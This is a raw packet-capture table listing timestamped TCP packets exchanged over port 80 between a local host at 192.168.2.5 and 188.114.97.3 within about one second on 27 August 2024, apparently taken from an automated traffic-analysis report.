                              Aug 27, 2024 09:48:53.854007959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.854016066 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.854049921 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.854063988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.854108095 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.854171038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.854181051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.854228020 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.854257107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.854266882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.854276896 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.854286909 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.854296923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.854299068 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.854321957 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.854367018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.854408026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.855158091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855175972 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855185032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855294943 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.855307102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855318069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855328083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855339050 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855348110 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.855386019 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.855400085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855427980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855437040 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855447054 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.855473995 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.855559111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855571032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855581999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855592012 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855618954 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.855642080 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.855729103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855740070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855748892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855760098 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855770111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855772018 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.855798006 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.855875969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855886936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855895996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855905056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.855921030 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.855947018 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.856141090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.856197119 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.856199980 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.856205940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.856256962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.856266975 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.856290102 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.856307030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.856313944 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.856317997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.856349945 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.856417894 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.856429100 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.856439114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.856448889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.856483936 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.856569052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.856580019 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.856589079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.856594086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.856632948 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.856650114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.857686996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.857697010 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.857706070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.857745886 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.857785940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.857795000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.857804060 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.857814074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.857815981 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.857848883 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.857877016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.857916117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.857956886 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.857985020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.857992887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.857997894 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858007908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858036041 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.858046055 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.858129978 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858139992 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858150005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858171940 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.858549118 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858598948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858608961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858623028 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.858688116 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.858697891 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858707905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858717918 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858747959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858752012 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.858786106 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.858798027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858808994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858841896 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.858843088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858853102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858876944 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.858906031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858917952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858947039 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.858958960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.858969927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859021902 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.859046936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859056950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859066010 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859076023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859086037 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859091997 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.859117031 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.859136105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859180927 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.859200001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859210014 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859246016 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.859301090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859309912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859318972 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859328985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859343052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859392881 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.859414101 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859424114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859431982 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859450102 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.859466076 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.859519005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859529018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859534025 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859544039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859560966 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.859586954 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.859616995 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859627008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859636068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859643936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.859667063 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.859695911 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.882208109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.882236958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.882246971 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.882291079 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.882546902 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.882560015 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.882569075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.882579088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.882589102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.882642984 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.882663012 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.942348957 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942362070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942373037 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942378998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942395926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942406893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942419052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942430973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942445040 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942457914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942495108 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.942539930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942552090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942564964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942589045 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.942614079 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.942661047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942672968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942682981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942704916 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.942720890 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.942807913 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942820072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942831039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942842007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942852020 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.942854881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942867041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.942878962 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.942919016 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.943747997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.943802118 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.943839073 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.943849087 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.943852901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.943880081 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.943973064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.943984032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.943994045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944011927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944024086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944061995 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.944075108 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.944111109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944122076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944139957 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944149971 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.944158077 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944170952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944175959 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.944183111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944225073 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.944360971 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944372892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944382906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944395065 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944406986 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944420099 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.944489956 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.944511890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944523096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944554090 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.944643021 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944708109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944719076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944741011 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.944819927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944830894 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944840908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944853067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944864035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944868088 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.944892883 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.944902897 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.944962978 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944973946 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944983959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.944996119 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.945008039 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.945034981 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.945075989 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.945138931 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.945151091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.945183992 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.946187973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.946199894 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.946209908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.946245909 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.946274996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.946286917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.946296930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.946305037 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.946310043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.946331024 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.946356058 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.946382046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.946453094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.946465015 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.946475983 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.946489096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.946497917 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.946522951 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.946590900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.946603060 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.946614981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.946625948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.946630955 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.946649075 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.947154045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947173119 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947186947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947205067 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.947235107 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.947295904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947307110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947319031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947329044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947345018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947381020 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.947407961 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.947422981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947444916 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947455883 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947465897 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.947494984 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.947576046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947587967 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947599888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947612047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947623968 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.947623968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947653055 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.947736025 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947746992 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947757006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947768927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947779894 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947818041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947829962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947830915 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.947849989 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.947873116 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.947900057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947911978 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947921991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947933912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.947945118 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.947982073 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.948103905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.948115110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.948124886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.948137999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.948149920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.948160887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.948173046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.948184013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.948196888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.948198080 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.948208094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.948213100 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.948220015 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.948246002 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.970858097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.970868111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.970875978 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.970899105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.970907927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.970916986 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.970927000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.970937014 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.970969915 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.971055031 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.030888081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.030898094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.030906916 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.030982018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.030991077 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.030997038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.031002045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.031011105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.031019926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.031075954 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.031127930 CEST8061383188.114.97.3192.168.2.5
